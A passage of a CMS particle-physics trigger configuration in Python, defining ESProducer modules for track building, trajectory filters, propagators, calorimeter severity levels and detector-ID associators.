cms.string( \"hltESPKFUpdator\" ),\n propagatorAlong = cms.string( \"PropagatorWithMaterial\" ),\n propagatorOpposite = cms.string( \"PropagatorWithMaterialOpposite\" ),\n estimator = cms.string( \"hltESPChi2MeasurementEstimator\" ),\n TTRHBuilder = cms.string( \"hltESPTTRHBWithTrackAngle\" ),\n MeasurementTrackerName = cms.string( \"hltESPMeasurementTracker\" ),\n trajectoryFilterName = cms.string( \"hltESPCkfTrajectoryFilter\" ),\n maxCand = cms.int32( 5 ),\n lostHitPenalty = cms.double( 30.0 ),\n intermediateCleaning = cms.bool( True ),\n alwaysUseInvalidHits = cms.bool( True ),\n appendToDataLabel = cms.string( \"\" )\n)\nhltESPCkf3HitTrajectoryFilter = cms.ESProducer( \"TrajectoryFilterESProducer\",\n ComponentName = cms.string( \"hltESPCkf3HitTrajectoryFilter\" ),\n appendToDataLabel = cms.string( \"\" ),\n filterPset = cms.PSet( \n minimumNumberOfHits = cms.int32( 3 ),\n minHitsMinPt = cms.int32( 3 ),\n ComponentType = cms.string( \"CkfBaseTrajectoryFilter\" ),\n maxLostHits = cms.int32( 1 ),\n maxNumberOfHits = cms.int32( -1 ),\n maxConsecLostHits = cms.int32( 1 ),\n chargeSignificance = cms.double( -1.0 ),\n nSigmaMinPt = cms.double( 5.0 ),\n minPt = cms.double( 0.9 )\n )\n)\nhltESPCkf3HitTrajectoryBuilder = cms.ESProducer( \"CkfTrajectoryBuilderESProducer\",\n ComponentName = cms.string( \"hltESPCkf3HitTrajectoryBuilder\" ),\n updator = cms.string( \"hltESPKFUpdator\" ),\n propagatorAlong = cms.string( \"PropagatorWithMaterial\" ),\n propagatorOpposite = cms.string( \"PropagatorWithMaterialOpposite\" ),\n estimator = cms.string( \"hltESPChi2MeasurementEstimator\" ),\n TTRHBuilder = cms.string( \"hltESPTTRHBWithTrackAngle\" ),\n MeasurementTrackerName = cms.string( \"hltESPMeasurementTracker\" ),\n trajectoryFilterName = cms.string( \"hltESPCkf3HitTrajectoryFilter\" ),\n maxCand = cms.int32( 5 ),\n lostHitPenalty = cms.double( 30.0 ),\n intermediateCleaning = cms.bool( True ),\n alwaysUseInvalidHits = cms.bool( True ),\n appendToDataLabel = cms.string( \"\" )\n)\nhltESPChi2MeasurementEstimator = cms.ESProducer( \"Chi2MeasurementEstimatorESProducer\",\n ComponentName = cms.string( \"hltESPChi2MeasurementEstimator\" ),\n MaxChi2 = cms.double( 30.0 ),\n nSigma = cms.double( 3.0 ),\n appendToDataLabel = cms.string( \"\" )\n)\nhltESPChi2EstimatorForRefit = cms.ESProducer( \"Chi2MeasurementEstimatorESProducer\",\n ComponentName = cms.string( \"hltESPChi2EstimatorForRefit\" ),\n MaxChi2 = cms.double( 100000.0 ),\n nSigma = cms.double( 3.0 ),\n appendToDataLabel = cms.string( \"\" )\n)\nhltESPAnalyticalPropagator = cms.ESProducer( \"AnalyticalPropagatorESProducer\",\n ComponentName = cms.string( \"hltESPAnalyticalPropagator\" ),\n PropagationDirection = cms.string( \"alongMomentum\" ),\n MaxDPhi = cms.double( 1.6 ),\n appendToDataLabel = cms.string( \"\" )\n)\nhcalRecAlgos = cms.ESProducer( \"HcalRecAlgoESProducer\",\n SeverityLevels = cms.VPSet( \n cms.PSet( RecHitFlags = cms.vstring( ),\n ChannelStatus = cms.vstring( ),\n Level = cms.int32( 0 )\n ),\n cms.PSet( RecHitFlags = cms.vstring( ),\n ChannelStatus = cms.vstring( 'HcalCellCaloTowerProb' ),\n Level = cms.int32( 1 )\n ),\n cms.PSet( RecHitFlags = cms.vstring( 'HSCP_R1R2',\n 'HSCP_FracLeader',\n 'HSCP_OuterEnergy',\n 'HSCP_ExpFit',\n 'ADCSaturationBit' ),\n ChannelStatus = cms.vstring( ),\n Level = cms.int32( 5 )\n ),\n cms.PSet( RecHitFlags = cms.vstring( 'HBHEHpdHitMultiplicity',\n 'HFDigiTime',\n 'HBHEPulseShape',\n 'HOBit',\n 'HFInTimeWindow',\n 'ZDCBit',\n 'CalibrationBit',\n 'TimingErrorBit' ),\n ChannelStatus = cms.vstring( ),\n Level = cms.int32( 8 )\n ),\n cms.PSet( RecHitFlags = cms.vstring( 'HFLongShort',\n 'HFS8S1Ratio',\n 'HFPET' ),\n ChannelStatus = cms.vstring( ),\n Level = cms.int32( 11 )\n ),\n cms.PSet( RecHitFlags = cms.vstring( ),\n ChannelStatus = cms.vstring( 'HcalCellCaloTowerMask' ),\n Level = cms.int32( 12 )\n ),\n cms.PSet( RecHitFlags = cms.vstring( ),\n ChannelStatus = cms.vstring( 'HcalCellHot' ),\n Level = cms.int32( 15 )\n ),\n cms.PSet( RecHitFlags = cms.vstring( ),\n ChannelStatus = cms.vstring( 'HcalCellOff',\n 'HcalCellDead' ),\n Level = cms.int32( 20 )\n )\n ),\n RecoveredRecHitBits = cms.vstring( 'TimingAddedBit',\n 'TimingSubtractedBit' ),\n appendToDataLabel = cms.string( \"\" ),\n DropChannelStatusBits = cms.vstring( 'HcalCellMask',\n 'HcalCellOff',\n 'HcalCellDead' )\n)\nhcalDetIdAssociator = cms.ESProducer( \"DetIdAssociatorESProducer\",\n ComponentName = cms.string( \"HcalDetIdAssociator\" ),\n appendToDataLabel = cms.string( \"\" ),\n etaBinSize = cms.double( 0.087 ),\n nEta = cms.int32( 70 ),\n nPhi = cms.int32( 72 ),\n includeBadChambers = cms.bool( False )\n)\necalSeverityLevel = cms.ESProducer( \"EcalSeverityLevelESProducer\",\n appendToDataLabel = cms.string( \"\" ),\n flagMask = cms.vuint32( 1, 114, 896, 4, 49152, 3080 ),\n dbstatusMask = cms.vuint32( 1, 2046, 0, 0, 0, 64512 ),\n timeThresh = cms.double( 2.0 )\n)\necalDetIdAssociator = cms.ESProducer( \"DetIdAssociatorESProducer\",\n ComponentName = cms.string( \"EcalDetIdAssociator\" ),\n appendToDataLabel = cms.string( \"\" ),\n etaBinSize = cms.double( 0.02 ),\n nEta = cms.int32( 300 ),\n nPhi = cms.int32( 360 ),\n includeBadChambers = cms.bool( False )\n)\ncosmicsNavigationSchoolESProducer = cms.ESProducer( \"NavigationSchoolESProducer\",\n ComponentName = cms.string( \"CosmicNavigationSchool\" ),\n appendToDataLabel = cms.string( \"\" )\n)\ncaloDetIdAssociator = cms.ESProducer( \"DetIdAssociatorESProducer\",\n ComponentName = cms.string( \"CaloDetIdAssociator\" ),\n appendToDataLabel = cms.string( \"\" ),\n etaBinSize = cms.double( 0.087 ),\n nEta = cms.int32( 70 ),\n nPhi = cms.int32( 72 ),\n includeBadChambers = cms.bool( False )\n)\nTransientTrackBuilderESProducer = cms.ESProducer( \"TransientTrackBuilderESProducer\",\n ComponentName = cms.string( \"TransientTrackBuilder\" ),\n appendToDataLabel = cms.string( \"\" )\n)\nSteppingHelixPropagatorAny = cms.ESProducer( \"SteppingHelixPropagatorESProducer\",\n ComponentName = cms.string( \"SteppingHelixPropagatorAny\" ),\n PropagationDirection = cms.string( \"anyDirection\" ),\n useInTeslaFromMagField = cms.bool( False ),\n SetVBFPointer = cms.bool( False ),\n useMagVolumes = cms.bool( True ),\n VBFName = cms.string( \"VolumeBasedMagneticField\" ),\n ApplyRadX0Correction = cms.bool( True ),\n AssumeNoMaterial = cms.bool( False ),\n NoErrorPropagation = cms.bool( False ),\n debug = cms.bool( False ),\n useMatVolumes = cms.bool( True ),\n useIsYokeFlag = cms.bool( True ),\n returnTangentPlane = cms.bool( True ),\n sendLogWarning = cms.bool( False ),\n useTuningForL2Speed = cms.bool( False ),\n useEndcapShiftsInZ = cms.bool( False ),\n endcapShiftInZPos = cms.double( 0.0 ),\n endcapShiftInZNeg = cms.double( 0.0 ),\n appendToDataLabel = cms.string( \"\" )\n)\nOppositeMaterialPropagator = cms.ESProducer( \"PropagatorWithMaterialESProducer\",\n ComponentName = cms.string( \"PropagatorWithMaterialOpposite\" ),\n PropagationDirection = cms.string( \"oppositeToMomentum\" ),\n Mass = cms.double( 0.105 ),\n MaxDPhi = cms.double( 1.6 ),\n useRungeKutta = cms.bool( False ),\n ptMin = cms.double( -1.0 ),\n appendToDataLabel = cms.string( \"\" )\n)\nMaterialPropagator = cms.ESProducer( \"PropagatorWithMaterialESProducer\",\n ComponentName = cms.string( \"PropagatorWithMaterial\" ),\n PropagationDirection = cms.string( \"alongMomentum\" ),\n Mass = cms.double( 0.105 ),\n MaxDPhi = cms.double( 1.6 ),\n useRungeKutta = cms.bool( False ),\n ptMin = cms.double( -1.0 ),\n appendToDataLabel = cms.string( \"\" )\n)\nEcalUnpackerWorkerESProducer = cms.ESProducer( \"EcalUnpackerWorkerESProducer\",\n ComponentName = cms.string( \"\" ),\n appendToDataLabel = cms.string( \"\" ),\n DCCDataUnpacker = cms.PSet( \n tccUnpacking = cms.bool( False ),\n orderedDCCIdList = cms.vint32( 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52, 53, 54 ),\n srpUnpacking = cms.bool( False ),\n syncCheck = cms.bool( False ),\n feIdCheck = cms.bool( True ),\n headerUnpacking = cms.bool( True ),\n orderedFedList = cms.vint32( 601, 602, 603, 604, 605, 606, 607, 608, 609, 610, 611, 612, 613, 614, 615, 616, 617, 618, 619, 620, 621, 622, 623, 624, 625, 626, 627, 628, 629, 630, 631, 632, 633, 634, 635, 636, 637, 638, 639, 640, 641, 642, 643, 644, 645, 646, 647, 648, 649, 650, 651, 652, 653, 654 ),\n feUnpacking = cms.bool( True ),\n forceKeepFRData = cms.bool( False ),\n memUnpacking = cms.bool( True )\n ),\n ElectronicsMapper = cms.PSet( \n numbXtalTSamples = cms.uint32( 10 ),\n numbTriggerTSamples = cms.uint32( 1 )\n ),\n UncalibRHAlgo = cms.PSet( Type = cms.string( \"EcalUncalibRecHitWorkerWeights\" ) ),\n CalibRHAlgo = cms.PSet( \n flagsMapDBReco = cms.vint32( 0, 0, 0, 0, 4, -1, -1, -1, 4, 4, 7, 7, 7, 8, 9 ),\n Type = cms.string( \"EcalRecHitWorkerSimple\" ),\n killDeadChannels = cms.bool( True ),\n ChannelStatusToBeExcluded = cms.vint32( 10, 11, 12, 13, 14 ),\n laserCorrection = cms.bool( False )\n )\n)\nCaloTowerConstituentsMapBuilder = cms.ESProducer( \"CaloTowerConstituentsMapBuilder\",\n MapFile = cms.untracked.string( \"Geometry/CaloTopology/data/CaloTowerEEGeometric.map.gz\" ),\n appendToDataLabel = cms.string( \"\" )\n)\nCaloTopologyBuilder = cms.ESProducer( \"CaloTopologyBuilder\",\n appendToDataLabel = cms.string( \"\" )\n)\nAnyDirectionAnalyticalPropagator = cms.ESProducer( \"AnalyticalPropagatorESProducer\",\n ComponentName = cms.string( \"AnyDirectionAnalyticalPropagator\" ),\n PropagationDirection = cms.string( \"anyDirection\" ),\n MaxDPhi = cms.double( 1.6 ),\n appendToDataLabel = cms.string( \"\" )\n)\nhltIter1ESPMeasurementTracker = cms.ESProducer( \"MeasurementTrackerESProducer\",\n ComponentName = cms.string( \"hltIter1ESPMeasurementTracker\" ),\n PixelCPE = cms.string( \"hltESPPixelCPEGeneric\" ),\n StripCPE = cms.string( \"StripCPEfromTrackAngle\" ),\n HitMatcher = cms.string( \"StandardMatcher\" ),\n Regional = cms.bool( True ),\n OnDemand = cms.bool( True ),\n UsePixelModuleQualityDB = cms.bool( True ),\n DebugPixelModuleQualityDB = cms.untracked.bool( False ),\n UsePixelROCQualityDB = cms.bool( True ),\n DebugPixelROCQualityDB = cms.untracked.bool( False ),\n UseStripModuleQualityDB = cms.bool( True ),\n DebugStripModuleQualityDB = cms.untracked.bool( False ),\n UseStripAPVFiberQualityDB = cms.bool( True ),\n DebugStripAPVFiberQualityDB = cms.untracked.bool( False ),\n MaskBadAPVFibers = cms.bool( True ),\n UseStripStripQualityDB = cms.bool( True ),\n DebugStripStripQualityDB = cms.untracked.bool( False ),\n SiStripQualityLabel = cms.string( \"\" ),\n switchOffPixelsIfEmpty = cms.bool( True ),\n pixelClusterProducer = cms.string( \"hltSiPixelClusters\" ),\n skipClusters = cms.InputTag( \"hltIter1ClustersRefRemoval\" ),\n stripClusterProducer = cms.string( \"hltIter1SiStripClusters\" ),\n stripLazyGetterProducer = cms.string( \"hltSiStripRawToClustersFacility\" ),\n appendToDataLabel = cms.string( \"\" ),\n inactivePixelDetectorLabels = cms.VInputTag( ),\n inactiveStripDetectorLabels = cms.VInputTag( ),\n badStripCuts = cms.PSet( \n TID = cms.PSet( \n maxConsecutiveBad = cms.uint32( 9999 ),\n maxBad = cms.uint32( 9999 )\n ),\n TOB = cms.PSet( \n maxConsecutiveBad = cms.uint32( 9999 ),\n maxBad = cms.uint32( 9999 )\n ),\n TEC = cms.PSet( \n maxConsecutiveBad = cms.uint32( 9999 ),\n maxBad = cms.uint32( 9999 )\n ),\n TIB = cms.PSet( \n maxConsecutiveBad = cms.uint32( 9999 ),\n maxBad = cms.uint32( 9999 )\n )\n )\n)\nhltIter1ESPPixelLayerTriplets = cms.ESProducer( \"SeedingLayersESProducer\",\n appendToDataLabel = cms.string( \"\" ),\n ComponentName = cms.string( \"hltIter1ESPPixelLayerTriplets\" ),\n layerList = cms.vstring( 'BPix1+BPix2+BPix3',\n 'BPix1+BPix2+FPix1_pos',\n 'BPix1+BPix2+FPix1_neg',\n 'BPix1+FPix1_pos+FPix2_pos',\n 'BPix1+FPix1_neg+FPix2_neg' ),\n BPix = cms.PSet( \n HitProducer = cms.string( \"hltSiPixelRecHits\" ),\n hitErrorRZ = cms.double( 0.0060 ),\n useErrorsFromParam = cms.bool( True ),\n TTRHBuilder = cms.string( \"hltESPTTRHBuilderPixelOnly\" ),\n skipClusters = cms.InputTag( \"hltIter1ClustersRefRemoval\" ),\n hitErrorRPhi = cms.double( 0.0027 )\n ),\n FPix = cms.PSet( \n HitProducer = cms.string( \"hltSiPixelRecHits\" ),\n hitErrorRZ = cms.double( 0.0036 ),\n useErrorsFromParam = cms.bool( True ),\n TTRHBuilder = cms.string( \"hltESPTTRHBuilderPixelOnly\" ),\n skipClusters = cms.InputTag( \"hltIter1ClustersRefRemoval\" ),\n hitErrorRPhi = cms.double( 0.0051 )\n ),\n TEC = cms.PSet( ),\n TID = cms.PSet( ),\n TIB = cms.PSet( ),\n TOB = cms.PSet( )\n)\nhltIter1ESPTrajectoryBuilderIT = cms.ESProducer( \"CkfTrajectoryBuilderESProducer\",\n ComponentName = cms.string( \"hltIter1ESPTrajectoryBuilderIT\" ),\n updator = cms.string( \"hltESPKFUpdator\" ),\n propagatorAlong = cms.string( \"PropagatorWithMaterial\" ),\n propagatorOpposite = cms.string( \"PropagatorWithMaterialOpposite\" ),\n estimator = cms.string( \"hltESPChi2MeasurementEstimator\" ),\n TTRHBuilder = cms.string( \"hltESPTTRHBWithTrackAngle\" ),\n MeasurementTrackerName = cms.string( \"hltIter1ESPMeasurementTracker\" ),\n trajectoryFilterName = cms.string( \"hltIter1ESPTrajectoryFilterIT\" ),\n maxCand = cms.int32( 5 ),\n lostHitPenalty = cms.double( 30.0 ),\n intermediateCleaning = cms.bool( True ),\n alwaysUseInvalidHits = cms.bool( False ),\n appendToDataLabel = cms.string( \"\" )\n)\nhltIter1ESPTrajectoryFilterIT = cms.ESProducer( \"TrajectoryFilterESProducer\",\n ComponentName = cms.string( \"hltIter1ESPTrajectoryFilterIT\" ),\n appendToDataLabel = cms.string( \"\" ),\n filterPset = cms.PSet( \n minimumNumberOfHits = cms.int32( 3 ),\n minHitsMinPt = cms.int32( 3 ),\n ComponentType = cms.string( \"CkfBaseTrajectoryFilter\" ),\n maxLostHits = cms.int32( 1 ),\n maxNumberOfHits = cms.int32( 100 ),\n maxConsecLostHits = cms.int32( 1 ),\n chargeSignificance = cms.double( -1.0 ),\n nSigmaMinPt = cms.double( 5.0 ),\n minPt = cms.double( 0.3 )\n )\n)\nhltIter2ESPMeasurementTracker = cms.ESProducer( \"MeasurementTrackerESProducer\",\n ComponentName = cms.string( \"hltIter2ESPMeasurementTracker\" ),\n PixelCPE = cms.string( \"hltESPPixelCPEGeneric\" ),\n StripCPE = cms.string( \"StripCPEfromTrackAngle\" ),\n HitMatcher = cms.string( \"StandardMatcher\" ),\n Regional = cms.bool( True ),\n OnDemand = cms.bool( True ),\n UsePixelModuleQualityDB = cms.bool( True ),\n DebugPixelModuleQualityDB = cms.untracked.bool( False ),\n UsePixelROCQualityDB = cms.bool( True ),\n DebugPixelROCQualityDB = cms.untracked.bool( False ),\n UseStripModuleQualityDB = cms.bool( True ),\n DebugStripModuleQualityDB = cms.untracked.bool( False ),\n UseStripAPVFiberQualityDB = cms.bool( True ),\n DebugStripAPVFiberQualityDB = cms.untracked.bool( False ),\n MaskBadAPVFibers = cms.bool( True ),\n UseStripStripQualityDB = cms.bool( True ),\n DebugStripStripQualityDB = cms.untracked.bool( False ),\n SiStripQualityLabel = cms.string( \"\" ),\n switchOffPixelsIfEmpty = cms.bool( True ),\n pixelClusterProducer = cms.string( \"hltSiPixelClusters\" ),\n skipClusters = cms.InputTag( \"hltIter2ClustersRefRemoval\" ),\n stripClusterProducer = cms.string( \"hltIter2SiStripClusters\" ),\n stripLazyGetterProducer = cms.string( \"hltSiStripRawToClustersFacility\" ),\n appendToDataLabel = cms.string( \"\" ),\n inactivePixelDetectorLabels = cms.VInputTag( ),\n inactiveStripDetectorLabels = cms.VInputTag( ),\n badStripCuts = cms.PSet( \n TID = cms.PSet( \n maxConsecutiveBad = cms.uint32( 9999 ),\n maxBad = cms.uint32( 9999 )\n ),\n TOB = cms.PSet( \n maxConsecutiveBad = cms.uint32( 9999 ),\n maxBad = cms.uint32( 9999 )\n ),\n TEC = cms.PSet( \n maxConsecutiveBad = cms.uint32( 9999 ),\n maxBad = cms.uint32( 9999 )\n ),\n TIB = cms.PSet( \n maxConsecutiveBad = cms.uint32( 9999 ),\n maxBad = cms.uint32( 9999 )\n )\n )\n)\nhltIter2ESPPixelLayerPairs = cms.ESProducer( \"SeedingLayersESProducer\",\n appendToDataLabel = cms.string( \"\" ),\n ComponentName = cms.string( \"hltIter2ESPPixelLayerPairs\" ),\n layerList = cms.vstring( 'BPix1+BPix2',\n 'BPix1+BPix3',\n 'BPix2+BPix3',\n 'BPix1+FPix1_pos',\n 'BPix1+FPix1_neg',\n 'BPix1+FPix2_pos',\n 'BPix1+FPix2_neg',\n 'BPix2+FPix1_pos',\n 'BPix2+FPix1_neg',\n 'BPix2+FPix2_pos',\n 'BPix2+FPix2_neg',\n 'FPix1_pos+FPix2_pos',\n 'FPix1_neg+FPix2_neg' ),\n BPix = cms.PSet( \n HitProducer = cms.string( \"hltSiPixelRecHits\" ),\n hitErrorRZ = cms.double( 0.0060 ),\n useErrorsFromParam = cms.bool( True ),\n TTRHBuilder = cms.string( \"hltESPTTRHBuilderPixelOnly\" ),\n skipClusters = cms.InputTag( \"hltIter2ClustersRefRemoval\" ),\n hitErrorRPhi = cms.double( 0.0027 )\n ),\n FPix = cms.PSet( \n HitProducer = cms.string( \"hltSiPixelRecHits\" ),\n hitErrorRZ = cms.double( 0.0036 ),\n useErrorsFromParam = cms.bool( True ),\n TTRHBuilder = cms.string( \"hltESPTTRHBuilderPixelOnly\" ),\n skipClusters = cms.InputTag( \"hltIter2ClustersRefRemoval\" ),\n hitErrorRPhi = cms.double( 0.0051 )\n ),\n TEC = cms.PSet( ),\n TID = cms.PSet( ),\n TIB = cms.PSet( ),\n TOB = cms.PSet( )\n)\nhltIter2ESPTrajectoryBuilderIT = cms.ESProducer( \"CkfTrajectoryBuilderESProducer\",\n ComponentName = cms.string( \"hltIter2ESPTrajectoryBuilderIT\" ),\n updator = cms.string( \"hltESPKFUpdator\" ),\n propagatorAlong = cms.string( \"PropagatorWithMaterial\" ),\n propagatorOpposite = cms.string( \"PropagatorWithMaterialOpposite\" ),\n estimator = cms.string( \"hltESPChi2MeasurementEstimator\" ),\n TTRHBuilder = cms.string( \"hltESPTTRHBWithTrackAngle\" ),\n MeasurementTrackerName = cms.string( \"hltIter2ESPMeasurementTracker\" ),\n trajectoryFilterName = cms.string( \"hltIter2ESPTrajectoryFilterIT\" ),\n maxCand = cms.int32( 5 ),\n lostHitPenalty = cms.double( 30.0 ),\n intermediateCleaning = cms.bool( True ),\n alwaysUseInvalidHits = cms.bool( False ),\n appendToDataLabel = cms.string( \"\" )\n)\nhltIter2ESPTrajectoryFilterIT = cms.ESProducer( \"TrajectoryFilterESProducer\",\n ComponentName = cms.string( \"hltIter2ESPTrajectoryFilterIT\" ),\n appendToDataLabel = cms.string( \"\" ),\n filterPset = cms.PSet( \n minimumNumberOfHits = cms.int32( 3 ),\n minHitsMinPt = cms.int32( 3 ),\n ComponentType = cms.string( \"CkfBaseTrajectoryFilter\" ),\n maxLostHits = cms.int32( 1 ),\n maxNumberOfHits = cms.int32( 100 ),\n maxConsecLostHits = cms.int32( 1 ),\n chargeSignificance = cms.double( -1.0 ),\n nSigmaMinPt = cms.double( 5.0 ),\n minPt = cms.double( 0.9 )\n )\n)\nhltIter3ESPLayerTripletsA = cms.ESProducer( \"SeedingLayersESProducer\",\n appendToDataLabel = cms.string( \"\" ),\n ComponentName = cms.string( \"hltIter3ESPLayerTripletsA\" ),\n layerList = cms.vstring( 'BPix1+BPix2+BPix3',\n 'BPix1+BPix2+FPix1_pos',\n 'BPix1+BPix2+FPix1_neg',\n 'BPix3+FPix1_pos+TID1_pos',\n 'BPix3+FPix1_neg+TID1_neg',\n 'FPix1_pos+FPix2_pos+TEC1_pos',\n 'FPix1_neg+FPix2_neg+TEC1_neg',\n 'FPix2_pos+TID3_pos+TEC1_pos',\n 'FPix2_neg+TID3_neg+TEC1_neg',\n 'FPix2_pos+TEC2_pos+TEC3_pos',\n 'FPix2_neg+TEC2_neg+TEC3_neg' ),\n BPix = cms.PSet( \n HitProducer = cms.string( \"hltSiPixelRecHits\" ),\n hitErrorRZ = cms.double( 0.0060 ),\n useErrorsFromParam = cms.bool( True ),\n TTRHBuilder = cms.string( \"hltESPTTRHBuilderPixelOnly\" ),\n skipClusters = cms.InputTag( \"hltIter3ClustersRefRemoval\" ),\n hitErrorRPhi = cms.double( 0.0027 )\n ),\n FPix = cms.PSet( \n HitProducer = cms.string( \"hltSiPixelRecHits\" ),\n hitErrorRZ = cms.double( 0.0036 ),\n useErrorsFromParam = cms.bool( True ),\n TTRHBuilder = cms.string( \"hltESPTTRHBuilderPixelOnly\" ),\n skipClusters = cms.InputTag( \"hltIter3ClustersRefRemoval\" ),\n hitErrorRPhi = cms.double( 0.0051 )\n ),\n TEC = cms.PSet( \n useRingSlector = cms.bool( True ),\n TTRHBuilder = cms.string( \"hltESPTTRHBWithTrackAngle\" ),\n minRing = cms.int32( 1 ),\n maxRing = cms.int32( 2 )\n ),\n TID = cms.PSet( \n useRingSlector = cms.bool( True ),\n TTRHBuilder = cms.string( \"hltESPTTRHBWithTrackAngle\" ),\n minRing = cms.int32( 1 ),\n maxRing = cms.int32( 2 )\n ),\n TIB = cms.PSet( ),\n TOB = cms.PSet( )\n)\nhltIter3ESPLayerTripletsB = cms.ESProducer( \"SeedingLayersESProducer\",\n appendToDataLabel = cms.string( \"\" ),\n ComponentName = cms.string( \"hltIter3ESPLayerTripletsB\" ),\n layerList = cms.vstring( 'BPix2+BPix3+TIB1',\n 'BPix2+BPix3+TIB2',\n 'BPix1+BPix3+TIB1',\n 'BPix1+BPix3+TIB2',\n 'BPix1+TIB1+TIB2',\n 'BPix2+TIB1+TIB2',\n 'BPix3+TIB1+TIB2' ),\n BPix = cms.PSet( \n HitProducer = cms.string( \"hltSiPixelRecHits\" ),\n hitErrorRZ = cms.double( 0.0060 ),\n useErrorsFromParam = cms.bool( True ),\n TTRHBuilder = cms.string( \"hltESPTTRHBuilderPixelOnly\" ),\n skipClusters = cms.InputTag( \"hltIter3ClustersRefRemoval\" ),\n hitErrorRPhi = cms.double( 0.0027 )\n ),\n FPix = cms.PSet( \n hitErrorRZ = cms.double( 0.0036 ),\n hitErrorRPhi = cms.double( 0.0051 ),\n TTRHBuilder = cms.string( \"hltESPTTRHBuilderPixelOnly\" ),\n HitProducer = cms.string( \"hltSiPixelRecHits\" ),\n useErrorsFromParam = cms.bool( True )\n ),\n TEC = cms.PSet( ),\n TID = cms.PSet( ),\n TIB = cms.PSet( TTRHBuilder = cms.string( \"hltESPTTRHBWithTrackAngle\" ) ),\n TOB = cms.PSet( )\n)\nhltIter3ESPMeasurementTracker = cms.ESProducer( \"MeasurementTrackerESProducer\",\n ComponentName = cms.string( \"hltIter3ESPMeasurementTracker\" ),\n PixelCPE = cms.string( \"hltESPPixelCPEGeneric\" ),\n StripCPE = cms.string( \"StripCPEfromTrackAngle\" ),\n HitMatcher = cms.string( \"StandardMatcher\" ),\n Regional = cms.bool( True ),\n OnDemand = cms.bool( True ),\n UsePixelModuleQualityDB = cms.bool( True ),\n DebugPixelModuleQualityDB = cms.untracked.bool( False ),\n UsePixelROCQualityDB = cms.bool( True ),\n DebugPixelROCQualityDB = cms.untracked.bool( False ),\n UseStripModuleQualityDB = cms.bool( True ),\n DebugStripModuleQualityDB = cms.untracked.bool( False ),\n UseStripAPVFiberQualityDB = cms.bool( True ),\n DebugStripAPVFiberQualityDB = cms.untracked.bool( False ),\n MaskBadAPVFibers = cms.bool( True ),\n UseStripStripQualityDB = cms.bool( True ),\n DebugStripStripQualityDB = cms.untracked.bool( False ),\n SiStripQualityLabel = cms.string( \"\" ),\n switchOffPixelsIfEmpty = cms.bool( True ),\n pixelClusterProducer = cms.string( \"hltSiPixelClusters\" ),\n skipClusters = cms.InputTag( \"hltIter3ClustersRefRemoval\" ),\n stripClusterProducer = cms.string( \"hltIter3SiStripClusters\" ),\n stripLazyGetterProducer = cms.string( \"hltSiStripRawToClustersFacility\" ),\n appendToDataLabel = cms.string( \"\" ),\n inactivePixelDetectorLabels = cms.VInputTag( ),\n inactiveStripDetectorLabels = cms.VInputTag( ),\n badStripCuts = cms.PSet( \n TID = cms.PSet( \n maxConsecutiveBad = cms.uint32( 9999 ),\n maxBad = cms.uint32( 9999 )\n ),\n TOB = cms.PSet( \n maxConsecutiveBad = cms.uint32( 9999 ),\n maxBad = cms.uint32( 9999 )\n ),\n TEC = cms.PSet( \n maxConsecutiveBad = cms.uint32( 9999 ),\n maxBad = cms.uint32( 9999 )\n ),\n TIB = cms.PSet( \n maxConsecutiveBad = cms.uint32( 9999 ),\n maxBad = cms.uint32( 9999 )\n )\n )\n)\nhltIter3ESPTrajectoryBuilderIT = cms.ESProducer( \"CkfTrajectoryBuilderESProducer\",\n ComponentName = cms.string( \"hltIter3ESPTrajectoryBuilderIT\" ),\n updator = cms.string( \"hltESPKFUpdator\" ),\n propagatorAlong = cms.string( \"PropagatorWithMaterial\" ),\n propagatorOpposite = cms.string( \"PropagatorWithMaterialOpposite\" ),\n estimator = cms.string( \"hltESPChi2MeasurementEstimator\" ),\n TTRHBuilder = cms.string( \"hltESPTTRHBWithTrackAngle\" ),\n MeasurementTrackerName = cms.string( \"hltIter3ESPMeasurementTracker\" ),\n trajectoryFilterName = cms.string( \"hltIter3ESPTrajectoryFilterIT\" ),\n maxCand = cms.int32( 5 ),\n lostHitPenalty = cms.double( 30.0 ),\n intermediateCleaning = cms.bool( True ),\n alwaysUseInvalidHits = cms.bool( False ),\n appendToDataLabel = cms.string( \"\" )\n)\nhltIter3ESPTrajectoryFilterIT = cms.ESProducer( \"TrajectoryFilterESProducer\",\n ComponentName = cms.string( \"hltIter3ESPTrajectoryFilterIT\" ),\n appendToDataLabel = cms.string( \"\" ),\n filterPset = cms.PSet( \n minimumNumberOfHits = cms.int32( 3 ),\n minHitsMinPt = cms.int32( 3 ),\n ComponentType = cms.string( \"CkfBaseTrajectoryFilter\" ),\n maxLostHits = cms.int32( 0 ),\n maxNumberOfHits = cms.int32( 100 ),\n maxConsecLostHits = cms.int32( 1 ),\n chargeSignificance = cms.double( -1.0 ),\n nSigmaMinPt = cms.double( 5.0 ),\n minPt = cms.double( 0.6 )\n )\n)\nhltIter4ESPMeasurementTracker = cms.ESProducer( \"MeasurementTrackerESProducer\",\n ComponentName = cms.string( \"hltIter4ESPMeasurementTracker\" ),\n PixelCPE = cms.string( \"hltESPPixelCPEGeneric\" ),\n StripCPE = cms.string( \"StripCPEfromTrackAngle\" ),\n HitMatcher = cms.string( \"StandardMatcher\" ),\n Regional = cms.bool( True ),\n OnDemand = cms.bool( True ),\n UsePixelModuleQualityDB = cms.bool( True ),\n DebugPixelModuleQualityDB = cms.untracked.bool( False ),\n UsePixelROCQualityDB = cms.bool( True ),\n DebugPixelROCQualityDB = cms.untracked.bool( False ),\n UseStripModuleQualityDB = cms.bool( True ),\n DebugStripModuleQualityDB = cms.untracked.bool( False ),\n UseStripAPVFiberQualityDB = cms.bool( True ),\n DebugStripAPVFiberQualityDB = cms.untracked.bool( False ),\n MaskBadAPVFibers = cms.bool( True ),\n UseStripStripQualityDB = cms.bool( True ),\n DebugStripStripQualityDB = cms.untracked.bool( False ),\n SiStripQualityLabel = cms.string( \"\" ),\n switchOffPixelsIfEmpty = cms.bool( True ),\n pixelClusterProducer = cms.string( \"hltSiPixelClusters\" ),\n skipClusters = cms.InputTag( \"hltIter4ClustersRefRemoval\" ),\n stripClusterProducer = cms.string( \"hltIter4SiStripClusters\" ),\n stripLazyGetterProducer = cms.string( \"hltSiStripRawToClustersFacility\" ),\n appendToDataLabel = cms.string( \"\" ),\n inactivePixelDetectorLabels = cms.VInputTag( ),\n inactiveStripDetectorLabels = 